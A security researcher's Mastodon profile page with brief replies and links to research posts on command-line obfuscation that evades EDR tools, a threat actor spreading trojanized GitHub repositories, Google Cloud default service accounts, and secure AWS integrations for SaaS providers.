Christophe 

@[email protected]
1.2K Followers
147 Following
304 Posts
• Cloud and container security
• Security research and open source at Datadog
🇨🇭🇫🇷
Websitehttps://christophetd.fr
GitHubhttps://github.com/christophetd
Twitter🪦
Show threadChristophe Dec 4
@moritz thank you, this was a useful read! I'm watching your repo closely 👀
Show threadChristophe Nov 27
@jerry Looks like it's back now!
Show threadChristophe Aug 14, 2025
@talsk Just seeing this now. You're a legend
Show threadChristophe Jun 26, 2025
@jerry Oh no! I hope you're wrong about this
Christophe Jun 25, 2025
@cfp_time FYI your website seems down at the moment
Show threadChristophe Mar 24, 2025
@wietze This is so cool! Love ArgFuscator, would be cool to allow for an OS filter to generate commands working for Linux/Windows/Mac
Christophe Mar 24, 2025
WietzeMar 24, 2025

By making minor changes to command-line arguments, it is possible to bypass EDR/AV detections.

My research, comprising ~70 Windows executables, found that all of them were vulnerable to this, to varying degrees.

Here’s what I found and why it matters 👉 https://wietze.github.io/blog/bypassing-detections-with-command-line-obfuscation

Bypassing Detections with Command-Line Obfuscation

Defensive tools like AVs and EDRs rely on command-line arguments for detecting malicious activity. This post demonstrates how command-line obfuscation, a shell-independent technique that exploits executables’ parsing “flaws”, can bypass such detections. It also introduces ArgFuscator, a new tool that documents obfuscation opportunities and generates obfuscated command lines.

Christophe Dec 16, 2024

New research: We've been monitoring a threat actor publishing dozens of trojanized GitHub repositories targeting threat actors, leaking hundreds of thousands of credentials along the way

https://securitylabs.datadoghq.com/articles/mut-1244-targeting-offensive-actors/

Getting a taste of your own medicine: Threat actor MUT-1244 targets offensive actors, leaking hundreds of thousands of credentials | Datadog Security Labs

This post describes an in-depth investigation by Datadog security researchers into a threat actor dubbed MUT-1244, which targets other malicious actors as well as security practitioners and academics.

Christophe Oct 29, 2024
Rory McCuneOct 29, 2024

Some interesting research by my colleague @christophetd on default service accounts in GCP. Looks at how default rights can be in place and some of the risks to GKE environments.

https://securitylabs.datadoghq.com/articles/google-cloud-default-service-accounts/

Exploring Google Cloud Default Service Accounts: Deep Dive and Real-World Adoption Trends | Datadog Security Labs

This post offers a deep dive into Google Cloud’s default service accounts, explaining their functionality, risks, and real-world adoption trends.

Christophe Sep 10, 2024

New blog post: A SaaS provider's guide to securely integrating with customers' AWS accounts

https://securitylabs.datadoghq.com/articles/securely-integrating-with-customers-aws-accounts/

A SaaS provider's guide to securely integrating with customers' AWS accounts | Datadog Security Labs

An opinionated guide to securing third-party AWS integrations